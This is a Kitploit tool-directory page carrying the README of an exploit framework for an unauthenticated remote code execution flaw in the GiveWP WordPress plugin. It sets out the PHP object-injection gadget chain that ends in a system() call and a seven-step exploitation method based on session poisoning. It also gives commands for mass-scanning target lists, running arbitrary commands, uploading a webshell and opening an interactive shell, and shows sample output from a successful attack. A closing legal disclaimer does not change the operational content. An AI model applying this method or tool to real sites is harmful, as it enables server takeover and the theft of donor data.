Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-82222 — Framework di exploit per CVE-2026-82222, una RCE non autenticata nel plugin WordPress GiveWP. Supporta scansione di massa, rilevamento automatico, multi-threading, output JSON/TXT e shell interattiva per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingCommand and ControlSviluppo Payload
GitHub
ghostlyrootb2h/cve-2026-82222

CVE-2026-82222

Framework di exploit per CVE-2026-82222, una RCE non autenticata nel plugin WordPress GiveWP. Supporta scansione di massa, rilevamento automatico, multi-threading, output JSON/TXT e shell interattiva per test autorizzati.

Vedi Repository
7h 38m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP Unauthenticated RCE Exploit
Mass Scanner + Auto-Detection + Multi-Threading + Interactive Shell


📋 Daftar Isi | Table of Contents

  • Overview
  • Fitur Utama | Key Features
  • Vulnerability Details
  • Instalasi | Installation
  • Parameter Lengkap | Complete Parameters
  • Contoh Penggunaan | Examples
  • Hasil Scan | Scan Results
  • How It Works
  • FAQ
  • Peringatan | Warning
  • Lisensi | License

  • 🎯 Overview

    GHOSTLYR00T è un framework di exploit per CVE-2026-82222, una vulnerabilità di PHP Object Injection nel plugin GiveWP per WordPress che consente Remote Code Execution (RCE) senza autenticazione. Questo strumento supporta mass scanning, auto-detection e interactive shell.

    🔴 CVSS 9.8 - CRITICAL

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 Fitur Utama | Key Features

    🇮🇩 Bahasa Indonesia

    FiturDeskripsi
    Mass ScanScan ratusan target dari file (-f targets.txt)
    Auto-DetectionDeteksi otomatis form ID, gateway, dan amount donasi
    Multi-ThreadingScan paralel dengan thread configurable (--threads)
    Check ModeFingerprint cepat tanpa exploit (--check)
    JSON OutputExport hasil ke JSON (--json)
    TXT OutputExport hasil ke TXT ringkas (--txt)
    Interactive ShellUpload webshell + terminal interaktif
    Admin EscalationAuto-escalate user ke administrator
    Progress BarMonitor real-time proses scanning
    Colored OutputOutput dengan warna dan format profesional

    🇬🇧 English

    FeatureDescription
    Mass ScanScan hundreds of targets from file (-f targets.txt)
    Auto-DetectionAuto-detects form ID, gateway, and donation amount
    Multi-ThreadingParallel scanning with configurable threads
    Check ModeFast fingerprint without exploitation (--check)
    JSON OutputExport results to JSON (--json)
    TXT OutputExport results to TXT (--txt)
    Interactive ShellUpload webshell + interactive terminal
    Admin EscalationAuto-escalate user to administrator
    Progress BarReal-time scan progress monitoring
    Colored OutputProfessional colored terminal output

    🔍 Vulnerability Details

    CVE-2026-82222 - GiveWP Unauthenticated RCE

    AspekDetail
    Affected VersionsGiveWP <= 4.16.7.1
    Patched VersionsGiveWP >= 4.16.7.2
    Attack VectorNetwork (AV:N)
    Privileges RequiredNone (PR:N)
    ImpactComplete System Compromise

    POP Chain:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 Instalasi | Installation

    🇮🇩 Bahasa Indonesia

    🔧 Persyaratan Sistem

    • OS: Linux / Windows / MacOS
    • Python: Versi 3.8 atau lebih baru
    • Library: requests, urllib3

    📥 Langkah Instalasi

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Tes apakah berhasil
    python3 poc.py -h
    

    🇬🇧 English

    🔧 System Requirements

    • OS: Linux / Windows / MacOS
    • Python: Version 3.8 or higher
    • Libraries: requests, urllib3

    📥 Installation Steps

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Test if successful
    python3 poc.py -h
    

    🎯 Parameter Lengkap | Complete Parameters

    🇮🇩 Bahasa Indonesia

    ParameterFungsiContoh
    -f, --fileFile target (batch mode)-f targets.txt
    --threadsJumlah thread (default: 4)--threads 10
    --jsonExport hasil ke JSON--json hasil.json
    --txtExport hasil ke TXT--txt hasil.txt
    -c, --commandCommand yang dieksekusi-c "id"
    -g, --gatewayForce gateway tertentu-g stripe
    -a, --amountForce amount donasi-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutTimeout per request (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🇬🇧 English

    ParameterFunctionExample
    -f, --fileTarget file (batch mode)-f targets.txt
    --threadsNumber of threads (default: 4)--threads 10
    --jsonExport results to JSON--json results.json
    --txtExport results to TXT--txt results.txt
    -c, --commandCommand to execute-c "id"
    -g, --gatewayForce specific gateway-g stripe
    -a, --amountForce donation amount-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutRequest timeout (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🔥 Contoh Penggunaan | Examples

    🇮🇩 Bahasa Indonesia

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 English

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 Hasil Scan | Scan Results

    🇮🇩 Bahasa Indonesia

    Terminal Output (Berhasil Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT Output (Check Mode)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON Output

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 English

    Terminal Output (Successful Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ How It Works

    🇮🇩 Bahasa Indonesia

    Sfruttamento Passo-Passo:

    1. Fingerprint: Rileva la versione di GiveWP tramite readme.txt e give.php
    2. Registrazione: Crea un account donatore senza autenticazione tramite give_action=user_register
    3. Archiviazione Payload: Salva l'oggetto PHP serializzato nei metadati last_name
    4. Scoperta Moduli: Trova i moduli di donazione tramite REST API e scraping
    5. Auto-Rilevamento Gateway/Importo: Testa le combinazioni di gateway e importo fino al successo
    6. Avvelenamento Sessione: Invia una donazione senza il campo give_last per attivare la deserializzazione
    7. Attivazione e Cattura: Accede alla sessione per riattivare il payload e catturare l'output

    Logica di Auto-Rilevamento:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 English

    Step-by-step Exploitation:

    1. Fingerprint: Detects GiveWP version via readme.txt and give.php
    2. Registration: Creates donor account via give_action=user_register
    3. Payload Storage: Stores serialized PHP object in last_name metadata
    4. Form Discovery: Finds donation forms via REST API and scraping
    5. Gateway/Amount Auto-Detection: Tests combinations until successful
    6. Session Poisoning: Submits donation without give_last to trigger deserialization
    7. Trigger & Capture: Accesses session to revive payload and capture output

    ❓ FAQ

    🇮🇩 Bahasa Indonesia

    PertanyaanJawaban
    Versi GiveWP apa yang rentan?GiveWP <= 4.16.7.1. Versi 4.16.7.2 dan di atasnya sudah patched.
    Kenapa harus -a 25?Beberapa form punya minimum amount (misal $25). Tools auto-detect, tapi bisa di-force.
    Bisa digunakan di production?TIDAK. Hanya untuk authorized testing.
    Kenapa registrasi gagal (HTTP 200)?Target mungkin registrasi dimatikan, WAF aktif, atau versi 4.16.6+.

    🇬🇧 English

    QuestionAnswer
    Which GiveWP versions are vulnerable?GiveWP <= 4.16.7.1. Version 4.16.7.2 and above are patched.
    Why use -a 25?Some forms have minimum amounts. Tool auto-detects, but can be forced.
    Can this be used in production?NO. For authorized testing only.
    Why registration fails (HTTP 200)?Target may have registration disabled, WAF active, or version 4.16.6+.

    ⚠️ Peringatan | Warning

    ⚠️ PERINGATAN HUKUM ⚠️

    TOOLS INI HANYA UNTUK PENELITIAN KEAMANAN!


    ⚠️ Ilegal: Mengakses server tanpa izin = tindak pidana
    ⚠️ UU ITE: Melanggar Pasal 30-32 tentang akses ilegal
    ⚠️ Hanya untuk: Pengujian sistem sendiri atau dengan izin tertulis
    ⚠️ Tanggung Jawab: Pengguna bertanggung jawab penuh atas penggunaan tools ini

    GUNAKAN DENGAN BIJAK DAN BERTANGGUNG JAWAB!

    ⚠️ LEGAL WARNING ⚠️

    THIS TOOL IS FOR SECURITY RESEARCH ONLY!


    ⚠️ Illegal: Accessing servers without permission = criminal offense
    ⚠️ Legal Risk: Violates computer fraud laws
    ⚠️ Authorized use only: Testing your own systems or with written permission
    ⚠️ Responsibility: Users are fully responsible for their use of this tool

    USE WISELY AND RESPONSIBLY!


    📜 Lisensi | License

    🇮🇩 Bahasa Indonesia

    Copyright © 2026 GhostlyrootB2H
    Didistribusikan di bawah lisensi MIT.

    🇬🇧 English

    Copyright © 2026 GhostlyrootB2H
    Distributed under the MIT License.


    👨‍💻 Author

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 Terima kasih telah menggunakan GHOSTLYR00T!
    Tools ini untuk pembelajaran dan pengujian keamanan.
    Jangan gunakan untuk aktivitas ilegal!

    🇬🇧 Thank you for using GHOSTLYR00T!
    For learning and security testing only.
    Do not use for illegal activities!

    Scarica lo strumento